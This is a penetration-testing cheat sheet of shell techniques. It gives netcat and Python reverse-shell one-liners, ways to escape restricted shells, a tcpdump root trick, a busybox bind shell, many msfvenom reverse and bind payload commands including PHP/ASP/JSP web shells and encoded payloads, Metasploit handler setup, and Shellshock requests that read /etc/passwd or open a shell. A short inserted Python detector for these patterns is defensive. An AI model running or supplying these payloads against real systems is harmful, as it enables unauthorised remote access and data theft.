Shells (Guide to all types of shells that you might need)

2017, Dec 17    

Netcat Shell Listener

  nc -nlvp 4444

Spawning a TTY Shell - Break out of Jail or limited shell

You should almost always upgrade your shell after taking control of an apache or www user.

(For example, when you see the error sh: no job control in this shell while trying to run an exploit.)

(hint: run sudo -l to see what you can run)

  • You may encounter limited shells that use rbash and only allow you to execute a single command per session. You can overcome this by executing an SSH shell to your localhost:
    ssh user@$ip nc $localip 4444 -e /bin/sh
    enter user's password
    python -c 'import pty; pty.spawn("/bin/sh")'
    export TERM=linux
  
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  
    # From within a Python prompt:
    echo os.system('/bin/bash')
  
    /bin/sh -i
  
    perl -e 'exec "/bin/sh";'
  
    # perl:
    exec "/bin/sh";
  
    # ruby:
    exec "/bin/sh"
  
    # lua:
    os.execute('/bin/sh')
  
    # From within IRB:
    exec "/bin/sh"
  
    # From within vi:
    :!bash
    # or
    :set shell=/bin/bash:shell
  
    # From within vim:
    :!bash
  
    # From within nmap (interactive mode):
    !sh
  
    # From within tcpdump (the -z post-rotate script runs as the -Z user):
    echo $'id\n/bin/netcat $ip 443 -e /bin/bash' > /tmp/.test
    chmod +x /tmp/.test
    sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
  
    # From busybox:
    /bin/busybox telnetd -l/bin/sh -p9999
  
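The same one-liners are what a defender should expect to see in process-execution telemetry when a web-server account is being upgraded to a full shell. The following scanner is an added example, not part of the original page: it classifies exec events against patterns derived from the commands above. The log format (pid uid exe argv, one event per line), the sample lines and the uid-33 = www-data mapping are constructed assumptions, not output from any real tool.

```python
import re
from typing import Dict, List, Tuple

# Detection rules derived from the shell-spawning one-liners on this page.
# Each entry is (rule name, regex applied to the exec'd command line).
SHELL_SPAWN_RULES: List[Tuple[str, re.Pattern]] = [
    ("pty-upgrade", re.compile(r"pty\.spawn\(\s*['\"]/bin/(?:ba)?sh['\"]")),
    ("python-reverse-shell", re.compile(r"socket\.socket\(.*os\.dup2\(.*subprocess")),
    ("netcat-exec", re.compile(r"\b(?:nc|netcat|ncat)\b.*\s-e\s*/bin/(?:ba)?sh")),
    ("busybox-telnetd-shell", re.compile(r"busybox\s+telnetd\b.*-l\s*/bin/(?:ba)?sh")),
    ("interpreter-exec-shell", re.compile(
        r"\b(?:perl|ruby|lua|python)\b.*(?:\bexec\b|os\.execute|os\.system)\s*\(?\s*['\"]/bin/(?:ba)?sh")),
]

# Assumption: uid 33 is www-data, the "apache or www user" the page talks about.
WEB_SERVICE_UIDS = {33}

# Constructed sample exec events: "pid uid exe argv" (not real audit output).
SAMPLE_EXEC_LOG = [
    '1021 33 /usr/bin/python python -c import pty; pty.spawn("/bin/sh")',
    '1022 33 /usr/bin/python python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.5",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);',
    '1023 33 /bin/nc nc 10.0.0.5 4444 -e /bin/sh',
    '1024 0 /bin/busybox /bin/busybox telnetd -l/bin/sh -p9999',
    '1025 33 /usr/bin/perl perl -e exec "/bin/sh";',
    '1026 1000 /usr/bin/python python -c print(1+1)',
    '1027 1000 /bin/nc nc -z 10.0.0.7 443',
]


def parse_exec_line(line: str) -> Tuple[int, int, str, str]:
    """Split one constructed 'pid uid exe argv' event into its fields."""
    pid, uid, exe, argv = line.split(" ", 3)
    return int(pid), int(uid), exe, argv


def classify(argv: str) -> List[str]:
    """Return the names of every rule that matches the command line."""
    return [name for name, rx in SHELL_SPAWN_RULES if rx.search(argv)]


def severity(uid: int, tags: List[str]) -> str:
    """A shell spawned by the web-server account is the case the page warns about."""
    if not tags:
        return "none"
    return "high" if uid in WEB_SERVICE_UIDS else "medium"


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run every event through the rules and collect the ones that match."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        pid, uid, exe, argv = parse_exec_line(line)
        tags = classify(argv)
        if tags:
            findings.append({"pid": pid, "uid": uid, "exe": exe,
                             "tags": tags, "severity": severity(uid, tags)})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EXEC_LOG):
        print(f"pid={f['pid']} uid={f['uid']} {f['severity']}: {', '.join(f['tags'])}")
```

Feeding real auditd EXECVE or EDR process-creation events into scan() only requires replacing parse_exec_line(); the rules themselves key on the arguments, so a renamed interpreter binary still matches as long as the argument string does.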
  

Creating Meterpreter Shells with MSFVenom

most-useful-msfvenom-payloads

Linux

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
  

Windows

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
  

Mac

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
  

Web Payloads

  • PHP
  msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
  ## OR
  msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

  ## Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage:
  cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
  • ASP
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
  • JSP
  msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
  • WAR
  msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Scripting Payloads

  • Python
  msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
  • Bash
  msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
  • Perl
  msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Shellcode

For all shellcode, see msfvenom --help-formats for the list of valid output formats. msfvenom will output code that can be cut and pasted into your exploit in the chosen language.

  • Linux Based Shellcode
  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
  • Windows Based Shellcode
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
  • Mac Based Shellcode
  msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Handlers

Metasploit handlers are a quick way to put Metasploit in a position to receive your incoming shells. Handlers should be in the following format.

  use exploit/multi/handler
  set PAYLOAD <Payload name>
  set LHOST <LHOST value>
  set LPORT <LPORT value>
  set ExitOnSession false
  exploit -j -z

Once the required values are filled in, the following command will execute your handler: msfconsole -L -r

  use auxiliary/scanner/ssh/ssh_login
  use post/multi/manage/shell_to_meterpreter
  • SBD.exe

    sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only.

    sbd.exe (part of the Kali Linux distribution: /usr/share/windows-binaries/backdoors/sbd.exe) can be uploaded to a Windows box as a Netcat alternative.

  • Shellshock

    • Testing for Shellshock with Nmap
      root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip
    
      ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
    
  • Shell Shock SSH Forced Command

    Check for a forced command by enabling all debug output with ssh

      ssh -vvv
      ssh -i noob noob@$ip '() { :;}; /bin/bash'
    
  • cat file (view file contents)
      echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () {:;}; echo \$(</etc/passwd)\r\nHost:vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
    
  • Shell Shock run bind shell
      echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost:vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
    

Reverse Shell with Msfvenom

List payloads

msfvenom -l

Or

msfvenom --list payloads

Generate a PHP payload

msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

Generate a Windows payload

Meterpreter - Reverse shell (x64):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse.exe

Meterpreter - Reverse shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_PORT> -f exe > reverse.exe

Meterpreter - Bind shell:

msfvenom -p windows/meterpreter/bind_tcp RHOST=<Target_IP> LPORT=<Target_Port> -f exe > bind.exe

CMD - Reverse shell:

msfvenom -p windows/shell/reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_port> -f exe > prompt.exe

Generate a Linux payload

Meterpreter - Reverse shell:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_port> -f elf > reverse_bin

Generate a Python payload

msfvenom -p cmd/unix/reverse_python LHOST=<Attacker_IP> LPORT=<Attacker_port> -f raw > reverse.py

Generate a WAR payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_port> -f war > payload.war

Generate an ASP payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_PORT> -f asp > reverse.asp

Generate encoded payloads

Shikata_ga_nai

msfvenom -p <PAYLOAD> -e shikata_ga_nai -i 5 -f raw > reverse
